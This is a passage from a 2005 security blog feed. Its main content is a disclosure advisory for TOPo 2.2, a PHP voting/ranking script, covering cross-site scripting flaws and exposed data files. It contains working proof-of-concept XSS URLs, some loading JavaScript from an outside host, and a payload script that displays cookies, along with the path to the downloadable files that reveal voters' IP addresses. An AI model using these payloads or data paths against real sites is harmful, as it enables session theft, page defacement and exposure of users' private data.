La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116720492493765462005-05-21T17:05:00.000-07:002005-05-21T17:08:46.253-07:00A thought...It can that is not so good idea to share what it is known.<br />The crude reality, unfortunately often surpasses the fiction...<br /><br />:X<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116508718588706252005-05-20T08:17:00.000-07:002005-05-21T03:11:10.883-07:00TOPo 2.2 multiple variable & fields XSS and information disclosure#######################################################<br />TOPo 2.2 multiple variable & fields XSS and information disclosure<br />vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info<br />advisore: http://lostmon.blogspot.com/2005/05/<br />topo-22-multiple-variable-fields-xss.html<br />vendor notified: yes exploit available: yes.<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=16699" target="_BLANK">16699</a> and <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=16699" target="_BLANK">16700</a><br />secunia:<a href="http://secunia.com/advisories/15325/" target="_BLANK">SA15325</a><br />Securitytracker:<a href="http://securitytracker.com/id?1014016 " target="_BLANK">1014016</a> <br />BID:<a href="http://securityfocus.com/bid/13700" target="_BLANK">13700</a> and <a href="http://securityfocus.com/bid/13701" target="_BLANK">13701</a><br />#######################################################<br /><br />TOPo is a free TOP system written in PHP that works<br />without MySQL database.TOPo is specially designed for<br />web sites hosted in web servers that not offer a<br />quality MySQL support.<br /><br />TOPo contains a flaw that allows a remote cross site<br />scripting attack.This flaw exists because the application<br />does not validate 'm','s','ID','t' and possible other parameters<br />upon submission to the 'index.php'script.This could allow a user<br />to create a specially crafted URL that would execute arbitrary<br />code in a user's browser within the trust relationship between<br />the browser and the server,leading to a loss of integrity.<br /><br />TOPo contains a flaw too that allow remote users to information<br />disclosure. All data are stored in '/data/' folder and all *.dat<br />files store all votes, comments and other information about the<br />site on top. Any user can download this files and obtain all <br />client ip address(all clients who are vote or added a comment)<br /><br />################<br />software use:<br />###############<br /><br />Microsoft Windows 2000 [Version 5.00.2195] all fixes.<br />Internet explorer 6.0 sp1 all fixes.<br />Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)<br />Google toolbar 2.0.114.9-big/es<br /><br />###########<br />versions:<br />###########<br /><br />TOPo v2.2.178 vulnerable.<br /><br />##############<br />solution<br />##############<br /><br />no solution was available at this time.<br /><br />############<br />time line<br />############<br /><br />discovered: 13 may 2005<br />vendor notify: 19 may 2005<br />vendor response:<br />vendor fix:<br />disclosure: 20 may 2005<br /><br />######################<br />Proof of concepts XSS<br />######################<br /><br />http://[victim]/topo/index.php?m=top"><br /><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js><br /></script>&s=info&ID=1114815037.2498 <br /><br />http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552<br />"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js><br /></SCRIPT>&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top&s=info"><br /><script>alert()</script>&ID=1115946293.3552&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top"><br /><script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=<br />1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/<br />injection/js.js></script><br /><br />http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1<br />&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev<br />/injection/js.js></script><br /><br />http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT<br />%20src=http://www.drorshalev.com/dev/injection/js.js></script> <br /><br />#########################<br /><br />Wen try to added a new comment some fields are vulnerable<br />to XSS style attacks.<br /><br />http://[victim]/top/index.php?m=top&s=info&t=comments<br />&paso=1&ID=1115946293.3552<br /><br />field name vulnerable, Your web field vulnerable and<br />your email field are vulnerable.<br /><br />##################<br />example of js.js<br />##################<br /><br />Thnx to http://www.drorshalev.com for this script and for hosting it<br />for this demostration.<br /><br />#################<br />js.js<br />#################<br /><br />function showIt(){<br />document.body.innerHTML="<a href='javascript:alert(document.cookie)<br />'><center><b>Your PC Can be hacked Via "+ document.domain<br />+" XSS ,Html Injection to a Web Site"+document.domain +" By<br />DrorShalev.com<br></b><br><img border=0 src=<br />'http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60<br />><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'<br />border=1><br></center></a>"+ <br />document.body.innerHTML window.status="Your PC Can be hacked Via<br />"+ document.domain +" XSS ,Html Injection to a Web Site "<br />+document.domain +" By DrorShalev.com" setTimeout<br />("window.open('view-source:http://sec.drorshalev.com/dev/<br />injection/xss.txt')",6000);<br />}<br />setTimeout("showIt()",2000);<br /><br />################<br />data disclosure<br />################<br /><br />http://[victim]/data/<br /><br />################ EnD #####################<br /><br />thnx to estrella to be my ligth<br />thnx to all http://www.osvdb.org Team<br />Thnx to http://www.drorshalev.com and dror <br />for his script and for hosting it !!!!<br />thnx to all who day after day support me !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.com